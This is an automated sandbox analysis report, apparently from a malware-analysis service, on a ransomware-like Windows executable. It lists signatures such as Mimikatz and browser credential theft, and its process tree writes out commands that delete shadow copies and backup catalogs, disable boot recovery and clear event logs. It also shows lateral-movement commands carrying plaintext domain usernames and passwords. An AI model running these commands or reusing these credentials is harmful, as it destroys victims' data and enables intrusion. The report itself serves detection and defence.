Analysis
-
max time kernel
141s -
max time network
150s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
26-08-2024 09:41
Static task
static1
Behavioral task
behavioral1
Sample
32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral4
Sample
32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
Resource
win11-20240802-en
General
-
Target
32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe
-
Size
1.8MB
-
MD5
59c3f3f99f44029de81293b1e7c37ed2
-
SHA1
fb07496900468529719f07ed4b7432ece97a8d3d
-
SHA256
32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471
-
SHA512
9b3bd8a76d754bf9c899111be986c4fd6d14f6993a9a0e3dcd9b4a76c0f7764ac8798f5cbc7a0467c1562638d85bf52f627bd32c125f587b1e838beaf03c8a0e
-
SSDEEP
49152:aIuQjMgjzus3wLNlDXjUoXFhKoT2iG6xQQqOeaGcWRrLy3pN+:a1bgjyQwhlDFEi5Qt7aGdRrLy5N
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Clears Windows event logs 1 TTPs 2 IoCs
pid Process 776 wevtutil.exe 1440 wevtutil.exe -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3844 bcdedit.exe 3324 bcdedit.exe -
mimikatz is an open source tool to dump credentials on Windows 1 IoCs
resource yara_rule behavioral4/memory/1020-17-0x0000000180000000-0x000000018002B000-memory.dmp mimikatz -
pid Process 848 wbadmin.exe -
Executes dropped EXE 64 IoCs
pid Process 1012 zhkyc.exe 1020 fxugs.exe 3884 _yjy.exe 1820 _vqv.exe 3120 _vqv.exe 2632 _vqv.exe 2400 _vqv.exe 2720 _vqv.exe 4164 _vqv.exe 2460 _vqv.exe 4744 _vqv.exe 4840 _vqv.exe 3148 _vqv.exe 1492 _vqv.exe 3732 _vqv.exe 1244 _vqv.exe 4388 _vqv.exe 2552 _vqv.exe 1160 _vqv.exe 752 _vqv.exe 1800 _vqv.exe 3796 _vqv.exe 4148 _vqv.exe 2152 _vqv.exe 1424 _vqv.exe 1308 _vqv.exe 4844 _vqv.exe 1420 _vqv.exe 3432 _vqv.exe 2184 _vqv.exe 4636 _vqv.exe 4532 _vqv.exe 4852 _vqv.exe 1268 _vqv.exe 1160 _vqv.exe 752 _vqv.exe 1800 _vqv.exe 3796 _vqv.exe 3124 _vqv.exe 4156 _vqv.exe 2348 _vqv.exe 1448 _vqv.exe 4936 _vqv.exe 1936 _vqv.exe 4612 _vqv.exe 792 _vqv.exe 2296 _vqv.exe 3000 _vqv.exe 3732 _vqv.exe 4040 _vqv.exe 3680 _vqv.exe 2948 _vqv.exe 2476 _vqv.exe 5016 _vqv.exe 2344 _vqv.exe 3760 _vqv.exe 5028 _vqv.exe 3828 _vqv.exe 3064 _vqv.exe 3228 _vqv.exe 4156 _vqv.exe 5048 _vqv.exe 3568 _vqv.exe 4840 _vqv.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _yjy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zhkyc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language _vqv.exe -
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1524 vssadmin.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1020 fxugs.exe 1020 fxugs.exe 1020 fxugs.exe 1020 fxugs.exe 1020 fxugs.exe 1020 fxugs.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeSecurityPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeTakeOwnershipPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeLoadDriverPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeSystemProfilePrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeSystemtimePrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeProfSingleProcessPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeIncBasePriorityPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeCreatePagefilePrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeBackupPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeRestorePrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeShutdownPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeDebugPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeSystemEnvironmentPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeRemoteShutdownPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeUndockPrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeManageVolumePrivilege 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: 33 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: 34 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: 35 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: 36 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe Token: SeDebugPrivilege 1020 fxugs.exe Token: SeShutdownPrivilege 3884 _yjy.exe Token: SeBackupPrivilege 2100 vssvc.exe Token: SeRestorePrivilege 2100 vssvc.exe Token: SeAuditPrivilege 2100 vssvc.exe Token: SeBackupPrivilege 2700 wbengine.exe Token: SeRestorePrivilege 2700 wbengine.exe Token: SeSecurityPrivilege 2700 wbengine.exe Token: SeSecurityPrivilege 776 wevtutil.exe Token: SeBackupPrivilege 776 wevtutil.exe Token: SeSecurityPrivilege 1440 wevtutil.exe Token: SeBackupPrivilege 1440 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1240 wrote to memory of 1012 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 81 PID 1240 wrote to memory of 1012 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 81 PID 1240 wrote to memory of 1012 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 81 PID 1240 wrote to memory of 1020 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 82 PID 1240 wrote to memory of 1020 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 82 PID 1240 wrote to memory of 3884 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 83 PID 1240 wrote to memory of 3884 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 83 PID 1240 wrote to memory of 3884 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 83 PID 3884 wrote to memory of 1288 3884 _yjy.exe 84 PID 3884 wrote to memory of 1288 3884 _yjy.exe 84 PID 1288 wrote to memory of 1524 1288 cmd.exe 86 PID 1288 wrote to memory of 1524 1288 cmd.exe 86 PID 3884 wrote to memory of 2948 3884 _yjy.exe 90 PID 3884 wrote to memory of 2948 3884 _yjy.exe 90 PID 2948 wrote to memory of 848 2948 cmd.exe 92 PID 2948 wrote to memory of 848 2948 cmd.exe 92 PID 3884 wrote to memory of 884 3884 _yjy.exe 96 PID 3884 wrote to memory of 884 3884 _yjy.exe 96 PID 884 wrote to memory of 3844 884 cmd.exe 98 PID 884 wrote to memory of 3844 884 cmd.exe 98 PID 884 wrote to memory of 3324 884 cmd.exe 99 PID 884 wrote to memory of 3324 884 cmd.exe 99 PID 3884 wrote to memory of 660 3884 _yjy.exe 100 PID 3884 wrote to memory of 660 3884 _yjy.exe 100 PID 660 wrote to memory of 776 660 cmd.exe 102 PID 660 wrote to memory of 776 660 cmd.exe 102 PID 3884 wrote to memory of 4668 3884 _yjy.exe 103 PID 3884 wrote to memory of 4668 3884 _yjy.exe 103 PID 4668 wrote to memory of 1440 4668 cmd.exe 105 PID 4668 wrote to memory of 1440 4668 cmd.exe 105 PID 1240 wrote to memory of 1820 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 106 PID 1240 wrote to memory of 1820 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 106 PID 1240 wrote to memory of 1820 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 106 PID 1240 wrote to memory of 2632 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 108 PID 1240 wrote to memory of 2632 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 108 PID 1240 wrote to memory of 2632 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 108 PID 1240 wrote to memory of 3120 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 109 PID 1240 wrote to memory of 3120 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 109 PID 1240 wrote to memory of 3120 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 109 PID 1240 wrote to memory of 2400 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 110 PID 1240 wrote to memory of 2400 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 110 PID 1240 wrote to memory of 2400 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 110 PID 1240 wrote to memory of 2720 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 115 PID 1240 wrote to memory of 2720 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 115 PID 1240 wrote to memory of 2720 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 115 PID 1240 wrote to memory of 4164 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 117 PID 1240 wrote to memory of 4164 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 117 PID 1240 wrote to memory of 4164 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 117 PID 1240 wrote to memory of 4744 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 119 PID 1240 wrote to memory of 4744 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 119 PID 1240 wrote to memory of 4744 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 119 PID 1240 wrote to memory of 4840 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 120 PID 1240 wrote to memory of 4840 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 120 PID 1240 wrote to memory of 4840 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 120 PID 1240 wrote to memory of 2460 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 121 PID 1240 wrote to memory of 2460 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 121 PID 1240 wrote to memory of 2460 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 121 PID 1240 wrote to memory of 3148 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 125 PID 1240 wrote to memory of 3148 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 125 PID 1240 wrote to memory of 3148 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 125 PID 1240 wrote to memory of 1492 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 127 PID 1240 wrote to memory of 1492 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 127 PID 1240 wrote to memory of 1492 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 127 PID 1240 wrote to memory of 3732 1240 32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe 130 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe"C:\Users\Admin\AppData\Local\Temp\32efb1eb360cda726f0eb7647d1963adf37dada4b1a4b5ec486c88bfa1f21471.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Users\Admin\AppData\Local\Temp\zhkyc.exe123 \\.\pipe\06680FF4-C391-462A-BF13-76FFBFD8210D2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1012
-
-
C:\Users\Admin\AppData\Local\Temp\fxugs.exe123 \\.\pipe\05598AD7-E27D-4D86-9465-FB9CEB12B8B52⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1020
-
-
C:\Users\Admin\AppData\Local\Temp\_yjy.exe"C:\Users\Admin\AppData\Local\Temp\_yjy.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet3⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
\??\c:\Windows\system32\vssadmin.exec:\Windows\system32\vssadmin.exe delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:1524
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet3⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet4⤵
- Deletes backup catalog
PID:848
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no3⤵
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:3844
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:3324
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl System3⤵
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl System4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl Security3⤵
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security4⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\mdns.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:2632
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\igmp.mcast.net -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:3120
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2400
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2720
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4164
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\239.255.255.250 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4744
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\10.127.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4840
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\224.0.0.252 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:2460
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3148
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:1492
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
PID:3732
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1244
-
-
C:\Users\Admin\AppData\Local\Temp\_vqv.exeC:\Users\Admin\AppData\Local\Temp\_vqv.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Users\Admin\AppData\Local\Temp\_omd.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4388
-
-
